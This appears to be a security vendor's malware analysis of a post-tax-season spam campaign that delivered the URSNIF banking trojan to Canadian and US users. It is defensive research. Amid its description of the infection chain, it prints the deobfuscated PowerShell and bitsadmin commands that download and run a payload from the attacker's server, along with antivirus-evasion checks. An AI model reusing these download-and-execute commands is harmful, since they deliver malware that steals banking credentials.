by Marshall Chen, Loseway Lu, Kawabata Kohei, and Rubio Wu
Tax season has traditionally been notorious for increased cybercrime activity, as threat actors take advantage of a large number of people rushing to file their taxes. The problem has cost taxpayers billions of dollars — tax fraud amounted to $2.5 billion worth of losses in 2017 alone — despite the US Internal Revenue Service (IRS)’s efforts to educate people on the scams.
Although many tax scams purely rely on social engineering, other campaigns make use of more sophisticated tools and techniques. We found and analyzed one such campaign delivering the notorious banking trojan known as URSNIF (detected as TSPY_URSNIF.TIBAICO) to North American targets on May 17. What’s notable about this malicious spam campaign is that it did not come with any attached malware or phishing links. Instead, it delivered malicious URLs that download a zip file with a downloader written in VBScript, which we later confirmed to be URSNIF.
One of the interesting aspects of this campaign is that it occurred post-tax season, which means that tax-themed scams are still being carried out by attackers past the various deadlines — perhaps targeting late filers.
Based on our Trend Micro Smart Protection Network™ (SPN) data, we observed the campaign lasting a few hours, with most of the spam email recipients located in Canada and the United States. In addition, the malicious files were configured to be only downloadable for North American IP addresses. The reason for this is that the attackers most likely wanted to target only taxpayers in the North American regions.
Figure 1: Location of the IP addresses targeted in the campaign. Most of the targets are users located in Canada. However, around half are US IPs because US providers hosted them
Figure 2: Infection chain for the malware
Our analysis showed that the spam emails sent to the targets contained subject headers that referenced tax-related topics or concerns. Some headers we discovered included:
- Levy arrears disbursement
- Levy dues disbursement
- Impost liabilities remuneration
- Fee outstanding payment(s) remuneration
- Fee arrears disbursement
- Tariff debt(s) remuneration
- Tariff arrears remuneration
- Tax arrears remuneration
- Tax dues payment
- Customs outstanding payments) disbursement
- Dues outstanding payment(s) disbursement
The regex of the subject list can be seen below:
(Charge|Customs|Dues|Duty|Excise|Fee|Impost|Levy|Tariff|Tax) (arrears|debt\(s\)|dues|liabilities|money owing|outstanding payment\(s\)) (disbursement|payment|repayment|remuneration|reward)
The content of the message itself included notifications of a rise in taxes and reminders that the person must file for reimbursement before May 24, 2018. The spam email also contains a URL that lures users to click the link to get more details. Some of the headers reference outstanding dues or payments, which might coincide with the timing of the post-tax season campaign
Analyzing the malicious URLs and zip files
We counted more than 100 URLs under 20 or more domains registered under the legitimate hosting service https://cloudstore.interoute.com/. These domains were mapped to the same IP space (220.127.116.11/24), showing that this campaign used multiple IP addresses and domain mapping.
The zip file attached to the phishing email contains two tax-related image files, seen below:
Figure 3. One of the attached tax-related image files
However, the VB script (Detected as VBS_REMAD.A) packed inside is the more important part of the attachment. The VB script was obfuscated by string manipulation methods that include Split, Replace, base64, and a simple XOR encryption.
Figure 4. The VB script code, which also contains filler latin text
After we removed the junk code and de-obfuscated the command, we discovered that the script uses two methods to download the file from the remote server. However, it will first check whether the compromised system contains AV products before it downloads the file. Specifically, it will determine whether certain directories (listed below) exist on the host computer.
- ‘C:\\ProgramData\\Panda Security’
- ‘C:\\ProgramData\\Trend Micro’
- ‘C:\\ProgramData\\Kaspersky Lab’
Note that while some of the strings contain text that reference security providers, other strings only contain letters and numbers. These strings are likely related to the abovementioned behavior.
The script uses the Windows PowerShell command to download the following file from the server:
- powershell -windowstyle hidden -ExecutionPolicy ByPass -NoProfile Start-BitsTransfer -Source hxxp://visioninsurancestore[.]com/jhfj6ydhhd910/bcnx63dggsnd/mopw[.]png -Destination $env:temp\ms_tmp.exe; Start-Process $env:temp\ms_tmp.exe
If no such directories exist, it will use cmd.exe to perform the following malicious activities:
- exe /c bitsadmin /transfer c4 hxxp://visioninsurancestore[.]com/jhfj6ydhhd910/bcnx63dggsnd/mopw[.]png
- %TEMP%/ms_tmp[.]exe &bitsadmin /create /download b2 &bitsadmin /addfile b2 hxxp://visioninsurancestore[.]com/jhfj6ydhhd910/bcnx63dggsnd/index[.]php
- %TEMP%/ms_tmp[.]txt &bitsadmin /setcustomheaders b2 User-Agent:DAMER &bitsadmin /resume b2 &bitsadmin /complete b2 &schtasks /create /st 88:88 /sc once /tn q7 /tr %TEMP%/ms_tmp[.]exe || start %TEMP%/ms_tmp[.]exe
Note that 88:88 will be replaced by the timestamp in the ‘%H:%m’ format seven minutes after the time script runs.
The VB Script uses the built-in Microsoft Windows download tool bitsadmin to get the file hosted at the following URL:
The attacker possibly registered this domain specifically for hosting malicious files. This domain resolves to IP 18.104.22.168 and ASN 31034.
The script downloads the PE file, which is packed by an unknown packer, from the server. The first stage of unpacking involves overwriting the PE image itself with the unpack code, while the second stage uses a mailslot (named ‘\\.\mailslot\msl0’) to decrypt the payload and use ReflectiveDLLInjection. The use of a mailslot is a misdirection method aimed at confusing security products and researchers.
Figure 5. Unpacking the PE file
URSNIF back in action
After the unpack procedure finishes, we can see the sample belongs to the malware family URSNIF, which has been used in other malspam campaigns before. The sample is actually a loader that further decrypts the final payload URSNIF and injects it into explore.exe.
By extracting the configuration from the PE payload, we discovered that the command-and-control (C&C) server is located at IP: 107[.]181[.]187[.]224, which resolves to AS46562.
URSNIF can inject its malicious payload into the victim’s browser. We also extracted the injection payload from the sample, which revealed that the actor is targeting banks mainly located in Canada, as seen in the following URL list:
Figure 6. The C&C server of the banking module
Figure 7. An example of an injected bank web page that harvests visitors’ usernames, passwords, and credit card information
We can see that the malicious spam attacks are aimed at a very specific target: North American citizens, particularly Canadians, in the midst of filing their taxes. In addition, everything from the creation of the images to the injection payload and even the security software evasion indicates that this campaign was not done haphazardly, but crafted by an attacker who knows his targets well and knows the right buttons to push to make them fall for classic social engineering techniques.
Mitigation and Trend Micro Solutions
Given the use of social engineering and spam mails in this campaign, users can largely avoid being compromised by adhering to principles that help secure their system against email-based threats. This includes the use of spam filters, implementing proper policy management, and maximizing email security mechanisms that mitigate the impact of these threats.
In addition, users should always be vigilant against attacks that use social engineering. This includes proper awareness of social engineering techniques as well as taking prudent measures when encountering opening emails or messages. As much as possible, users should avoid clicking any links or downloading any attachments unless they are certain of the source’s legitimacy.
Context should also be taken into account. In this example, the campaign occurred after the tax season has ended. Therefore, unless the recipient was late in filing their taxes, an email referencing tax season should be seen as a red flag.
Trend Micro endpoint solutions such as Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security can protect users and businesses from these threats by detecting malicious files, and spammed messages as well as blocking all related malicious URLs. Trend Micro Deep Discovery™ has an email inspection layer that can protect enterprises by detecting malicious attachment and URLs.
Trend Micro™ Hosted Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network. It protects Microsoft Exchange, Microsoft Office 365, Google Apps, and other hosted and on-premises email solutions.
Trend Micro™ OfficeScan™ with XGen™ endpoint security infuses high-fidelity machine learning with other detection technologies and global threat intelligence for comprehensive protection against advanced malware.
Indicators of Compromise (IoCs):
Zip files (SHA-256):
VB script (SHA-256)
- 56b1b50f53fedffa04efb965bb7f6297e1cb34d9d4086e1ea3973f84a48ac0c3 (VBS_REMAD.A)
EXE file (SHA-256)
- 38cdd601c19eaf32b31d9a17ddd5b636eafafca85a9b2de549fec0b040882a5d (TSPY_URSNIF.TIBAICO)